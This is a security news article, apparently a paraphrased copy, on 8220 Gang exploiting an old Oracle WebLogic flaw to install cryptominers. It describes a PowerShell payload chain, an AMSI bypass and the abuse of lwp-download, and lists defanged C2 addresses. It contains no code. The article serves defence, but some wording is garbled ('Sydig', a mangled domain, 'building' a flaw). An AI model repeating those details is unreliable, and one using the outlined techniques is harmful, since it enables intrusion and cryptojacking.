Notorious cryptojacking group tracked as 8220 Gang has been seen building a six-year-old security flaw in Oracle WebLogic servers to trap vulnerable instances in a botnet and distribute cryptocurrency-mining malware.
The defect in question is CVE-2017-3506 (CVSS score: 7.4), which, when successfully exploited, could allow an unauthenticated attacker to remotely execute arbitrary commands.
"This allows attackers to gain unauthorized access to sensitive data or compromise the entire system," said Sunil Bharti, a researcher at Trend Micro. saying in a report released this week.
8220 gang, first documented by Cisco Talos in late 2018, it is named for its original use of port 8220 for command and control (C2) network communications.
"8220 Gang identifies targets by scanning for misconfigured or vulnerable hosts on the public Internet", SentinelOne noted last year. "The 8220 Gang is known to use SSH brute force attacks after infection in order to move laterally within a compromised network."
Earlier this year, Sydig detailed attacks mounted by the "low skill" crimeware group between November 2022 and January 2023 that aim to breach the vulnerable Oracle WebLogic and Apache web servers and implement a cryptocurrency miner.
It has also been observed that it makes use of a standard malware downloader known as PureCrypter as well as a codenamed crypter ScrubCrypt to hide the payload from the miner and evade detection by security software.
In the latest chain of attacks documented by Trend Micro, the Oracle WebLogic Server vulnerability is exploited to deliver a PowerShell payload, which is then used to create another obfuscated PowerShell script in memory.
This newly created PowerShell script disables the Windows anti-malware scanning interface (AMSI) and launches a Windows binary that subsequently reaches a remote server to retrieve a "meticulously obfuscated" payload.
Learn how to stop ransomware with real-time protection
Join our webinar and learn how to stop ransomware attacks in their tracks with real-time MFA and service account protection.
The intermediate DLL, meanwhile, is configured to download a cryptocurrency miner from one of three C2 servers: 179.43.155[.]202, work.letmaker[.]top and su-94.letmaker[.]above: Using TCP ports 9090, 9091, or 9092.
Trend Micro said that the recent attacks also involved the misuse of a legitimate Linux tool called lwp-download to save arbitrary files on the compromised host.
"lwp-download is a Linux utility present on various platforms by default, and 8220 Gang makes this part of any routine. Malware can affect a number of services, even if reused more than once," Bharti said. .
"Given the threat actor's tendency to reuse tools for different campaigns and abuse legitimate tools as part of the arsenal, organizations' security teams could be challenged to find other detection and blocking solutions to defend against attacks that abuse this utility".
